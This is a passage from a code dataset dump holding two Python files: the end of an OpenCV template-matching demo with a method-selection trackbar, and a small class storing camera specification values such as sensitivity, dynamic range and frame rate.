res, 0, 1, cv.NORM_MINMAX, -1 )\n\t# if method is SQDIFF best match is Global minimum else it is global maximum\n\tif method in [cv.TM_SQDIFF,cv.TM_SQDIFF_NORMED]: \n\t\ttop_left = min_loc\n\telse:\n\t\ttop_left = max_loc\n\n\tbottom_right = (top_left[0] + w, top_left[1] + h)\n\tcv.rectangle(img2,top_left, bottom_right, 0, 2)\n\tmatch = \"match_using \" + methods[method]\n\tcv.imshow( match,img2)\n\tcv.imshow('result',res)\n\nif __name__ == '__main__':\n\n\tglobal img\n\timg = cv.imread('messi.jpg',0)\n\tglobal template\n\ttemplate = cv.imread('template1.jpg',0)\n\tw, h = template.shape[::-1]\n\tcv.namedWindow('image', cv.WINDOW_AUTOSIZE)\n\tcv.namedWindow('result',cv.WINDOW_AUTOSIZE)\n\n\tglobal methods\n\tmethods = ['cv.TM_SQDIFF','cv.TM_SQDIFF_NORMED','cv.TM_CCORR', 'cv.TM_CCORR_NORMED', 'cv.TM_CCOEFF', 'cv.TM_CCOEFF_NORMED']\n\t\n\ttrackbar_label = 'Method: \\n 0: SQDIFF \\n 1: SQDIFF NORMED \\n 2: TM CCORR \\n 3: TM CCORR NORMED \\n 4: TM COEFF \\n 5: TM COEFF NORMED'\n\tcv.createTrackbar(trackbar_label,'image',0,5,MatchingTemplate)\n\tcv.imshow('image',img)\n\tif cv.waitKey(0) == ord('c'): cv.destroyAllWindows()\n","repo_name":"AvnishGupta143/opencv_basic","sub_path":"Image_processing_py_codes/12.Template_Matching.py","file_name":"12.Template_Matching.py","file_ext":"py","file_size_in_byte":3231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"23470660182","text":"class SDVVF:\n def __init__(self):\n \n self.Sensitivity = {\n 'Value': 0.05,\n 'Unit': 'lux',\n 'Type': 'float'\n }\n\n self.DynamicRange = {\n 'Value': 8,\n 'Unit': 'bit',\n 'Type': 'int'\n }\n\n self.VideoFormats = {\n 'Lenght': 1280,\n 'Width': 960,\n 'Unit': 'pixel',\n 'Type': 'int'\n }\n\n self.VideoFormatsPixel = {\n 'Total': 1.2*10**6,\n 'Unit': 'pixel',\n 'Type': 'int'\n }\n\n self.FrameRateMaximum = {\n 'Value': 15,\n 'Unit': 'fps', #FramesperSecond\n 'Type': 'int'\n }\n","repo_name":"juanen1602/API_Camera_DMK","sub_path":"JsonFile/Specifications/GeneralBehavior/SDVVF/sdvvf.py","file_name":"sdvvf.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"hi","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"}